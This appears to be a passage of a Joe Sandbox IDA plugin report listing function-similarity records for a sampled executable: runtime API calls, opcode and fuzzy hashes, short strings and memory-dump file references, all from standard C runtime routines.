                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 30f3363f64594c69e0fce7bb90d3314767a4f80e4f390fe0ca363276a655e978
                                                                        • Instruction ID: ef9679fc03596aadc48ef3cfc465ff8e98842089bcd054c5303f7a0f589b149e
                                                                        • Opcode Fuzzy Hash: 30f3363f64594c69e0fce7bb90d3314767a4f80e4f390fe0ca363276a655e978
                                                                        • Instruction Fuzzy Hash: 0351EE7E604242AFDB288F54D881F7A77E4EF54300F1485BDE9468B291E771EC80C750
                                                                        APIs
                                                                          • Part of subcall function 00BCF889: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00BD1030,?,00000000,-00000008), ref: 00BCF8EA
                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00BD54AE
                                                                        • __dosmaperr.LIBCMT ref: 00BD54B5
                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00BD54EF
                                                                        • __dosmaperr.LIBCMT ref: 00BD54F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1913693674-0
                                                                        • Opcode ID: 7e92b3689e9ec8516acbf4fb9f3206a91eb67e2cdb947e839c80f11c1a01cbad
                                                                        • Instruction ID: d9b70f208c4b10533904d3b2a3e8c13236b056b8d949cc6f83426ca91a215ec1
                                                                        • Opcode Fuzzy Hash: 7e92b3689e9ec8516acbf4fb9f3206a91eb67e2cdb947e839c80f11c1a01cbad
                                                                        • Instruction Fuzzy Hash: CA21A171600A05AF9B31AF659881E6BFBE9FF5536871085AEF819D7350EB30EC408F61
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 68a3b7feb40e676d3aed090460605f51d5c40e0c5fef2aa979b527d256d14790
                                                                        • Instruction ID: 7faea19ec2101526fca2aba983740f92e36bcc303ec1c4da612bd83b8f3857f6
                                                                        • Opcode Fuzzy Hash: 68a3b7feb40e676d3aed090460605f51d5c40e0c5fef2aa979b527d256d14790
                                                                        • Instruction Fuzzy Hash: 2E218E31600396AFEB10AF65DCA5F6B77E9EF4136471085ADF929D7150EB30EE408760
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00BD6210
                                                                          • Part of subcall function 00BCF889: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00BD1030,?,00000000,-00000008), ref: 00BCF8EA
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BD6248
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BD6268
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 158306478-0
                                                                        • Opcode ID: 043127d6c5ba8839a926be11c38013bc0a01ad6a9029a24a8dc822200e6b2622
                                                                        • Instruction ID: 4432fb3b1f1cfebbc3064aecccf7671daf182606b94b194b717de09181cae7a0
                                                                        • Opcode Fuzzy Hash: 043127d6c5ba8839a926be11c38013bc0a01ad6a9029a24a8dc822200e6b2622
                                                                        • Instruction Fuzzy Hash: CA1196B15016567E6B1527729CCEDBFAFEDDE9939431000EBF805D6201FE64DD024571
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000), ref: 00BDF1CF
                                                                        • GetLastError.KERNEL32(?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000,?,?,?,00BD7055,?), ref: 00BDF1DB
                                                                          • Part of subcall function 00BDF22C: CloseHandle.KERNEL32(FFFFFFFE,00BDF1EB,?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000,?,?), ref: 00BDF23C
                                                                        • ___initconout.LIBCMT ref: 00BDF1EB
                                                                          • Part of subcall function 00BDF20D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00BDF1A9,00BDD75C,?,?,00BD770F,?,00000000,00000000,?), ref: 00BDF220
                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000,?), ref: 00BDF200
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 26832a6e26e93338eca165074e827a3646d0b1ffd4d3a438e2a9504a6ed2390a
                                                                        • Instruction ID: af03d3e2b2d5d633681ee0a54a756dff12c721803ee5dfc3d97ba1530bdc9cd0
                                                                        • Opcode Fuzzy Hash: 26832a6e26e93338eca165074e827a3646d0b1ffd4d3a438e2a9504a6ed2390a
                                                                        • Instruction Fuzzy Hash: D6F0A23B544155BBCF125F95DC459AA7F65FB493A1B044171FA199A230DA3188209B90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: a3327e4b85bc9cee8ccc1a79b0a96baf3b8f1dc97ffbfa910a2b6d4aa7e5cd41
                                                                        • Instruction ID: 3fe9e7a446afe64ad61bc82b2ba76e04b73be59d0684fa0a855ea531a54294fc
                                                                        • Opcode Fuzzy Hash: a3327e4b85bc9cee8ccc1a79b0a96baf3b8f1dc97ffbfa910a2b6d4aa7e5cd41
                                                                        • Instruction Fuzzy Hash: B59127B460C3409FC764DF18C4D462EBBE0EB9A314F58489EE99AD7326D631DD948B83
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00BC44BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: 240a5e940830fce111a7effd5996ca43c68867e99b06c9e1638ea551c5b15f0b
                                                                        • Instruction ID: cf6dabf6c6b4b77965a2639b4a97f401da9a6b88c5c44c485e5656307112df7e
                                                                        • Opcode Fuzzy Hash: 240a5e940830fce111a7effd5996ca43c68867e99b06c9e1638ea551c5b15f0b
                                                                        • Instruction Fuzzy Hash: F2516761A0810397CB197B18C9A1FBE2BE5DB50750F3089FCE4D6863A9EF348D849A46
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00BC80ED,?,?,?,00000055,?,-00000050,?,?,?), ref: 00BD40E9
                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00BC80ED,?,?,?,00000055,?,-00000050,?,?), ref: 00BD4120
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CodePageValid
                                                                        • String ID: utf8
                                                                        • API String ID: 943130320-905460609
                                                                        • Opcode ID: 59c7718126b6462cb1f46d481670309dde28719fa1db4010b68dea15dcec709c
                                                                        • Instruction ID: 35c0ce40e1ceebf1513a65c6f9ccb37bf36845bc6bb1a6399d81ec4774107494
                                                                        • Opcode Fuzzy Hash: 59c7718126b6462cb1f46d481670309dde28719fa1db4010b68dea15dcec709c
                                                                        • Instruction Fuzzy Hash: 3351C231650305ABDB25AB718C82FA7F7E8EF45700F1445EBFA459B382F770E9408661
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bad locale name
                                                                        • API String ID: 0-1405518554
                                                                        • Opcode ID: 533f5d8b9a7e7af10dffaf80f38ac599561dc799fc28e942d73d56e1ba678d2d
                                                                        • Instruction ID: 20a6943c106370063a8c75f95da4e41e13478c643ae2e753539e4773ad3f4159
                                                                        • Opcode Fuzzy Hash: 533f5d8b9a7e7af10dffaf80f38ac599561dc799fc28e942d73d56e1ba678d2d
                                                                        • Instruction Fuzzy Hash: FC41B1A06083489BCB249F6984957BEBBD5AB95344F1008ACF85BCB381D7F9CD588793
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bad locale name
                                                                        • API String ID: 0-1405518554
                                                                        • Opcode ID: 022f2b08d244aa59224610dcc46c759628c5fbbe88a6e745409ebc2bb82ec888
                                                                        • Instruction ID: fe1af374f75c63bfe68579461dd2dce4e03e137e2860d4ecf1cf73329f616197
                                                                        • Opcode Fuzzy Hash: 022f2b08d244aa59224610dcc46c759628c5fbbe88a6e745409ebc2bb82ec888
                                                                        • Instruction Fuzzy Hash: 8531E57060C3498BDB109BA994D57BFB6D0AB8A344F5048BDF85B8B381D7B5CC888797
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: 29deaa94cb9ec606c9c1a5ef88d27c14580741e111385e533bb71b4f2e4a48aa
                                                                        • Instruction ID: 7729fd5de0806850333f0d03969139c128357bab2c0f6efd9035e9812fb0d894
                                                                        • Opcode Fuzzy Hash: 29deaa94cb9ec606c9c1a5ef88d27c14580741e111385e533bb71b4f2e4a48aa
                                                                        • Instruction Fuzzy Hash: 4C413B7460C244DFC7249F28D595A2EBBE1EF86304F14889EF89A8B326D731CD448B93
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: 274c5ba61d0be3dc0cc1df80e95a490ac77f15d29ad9bd3c0290fde2e85a31fa
                                                                        • Instruction ID: 4d8601ba0eeb48d67fe303f624ac57c04924c447c59e408ae1ea3c21cf41b8a9
                                                                        • Opcode Fuzzy Hash: 274c5ba61d0be3dc0cc1df80e95a490ac77f15d29ad9bd3c0290fde2e85a31fa
                                                                        • Instruction Fuzzy Hash: F141C074608240DFCB249F28C4916BABBE4EF85304F54889EE49ADB316C778DD40CB93
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: c5d740eb9fb0bac1b5bef6a90293ce3d7ab5d096fe5d6a23f2f15027d43e0527
                                                                        • Instruction ID: 44d7f64c148e4f8d44a622bb1e1f0fdd66828bd0ca778fde32997e46eb0fdfa8
                                                                        • Opcode Fuzzy Hash: c5d740eb9fb0bac1b5bef6a90293ce3d7ab5d096fe5d6a23f2f15027d43e0527
                                                                        • Instruction Fuzzy Hash: B441B1746096409FCB249F28C49167ABBE4EB85304F54489DE49ACB316C774DD40C793
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: d97a654bb67dcfdca7e58b090a0ebfece4b286616fc69ec0534b1ac9c41be33f
                                                                        • Instruction ID: d1b20420ab5f4ac7e66d4b0a1181a0b60b0666fb3626a9e4067e73537baeacd5
                                                                        • Opcode Fuzzy Hash: d97a654bb67dcfdca7e58b090a0ebfece4b286616fc69ec0534b1ac9c41be33f
                                                                        • Instruction Fuzzy Hash: B141E274608240DFC7249F28D5A167BBBE4EF85300F1448AEE45A8B356C778DD408793
                                                                        APIs
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00BCD74C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ___except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 3493665558-3733052814
                                                                        • Opcode ID: dd30419b66df1afad5e11204ecebab539c0947b3df7bf24c8fd20b0bf479d8db
                                                                        • Instruction ID: 426f96b16febafd5c57901358382d59107c02e02948794a1cf54e1d1e4d59596
                                                                        • Opcode Fuzzy Hash: dd30419b66df1afad5e11204ecebab539c0947b3df7bf24c8fd20b0bf479d8db
                                                                        • Instruction Fuzzy Hash: 10315E7A500259ABCF269F50C844FAA7BE6FF08715B1845AEFC584A121D332DCA1DB91
                                                                        APIs
                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00BA8B1C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ___std_exception_destroy
                                                                        • String ID: },4)$},4)
                                                                        • API String ID: 4194217158-1349039888
                                                                        • Opcode ID: d00d24428b834695abaf75a5193fb2d4bfe000e891c5477e5c01c8dd9a98ebb7
                                                                        • Instruction ID: 7f3dc96878855eece6d025cabd3fa234dd0ccee7ec564468afeb351e51ae13e7
                                                                        • Opcode Fuzzy Hash: d00d24428b834695abaf75a5193fb2d4bfe000e891c5477e5c01c8dd9a98ebb7
                                                                        • Instruction Fuzzy Hash: D501F9F095D2004BCE545B1898D252E76D49F76308F850CA9F44AEB620DF32DC44C7E7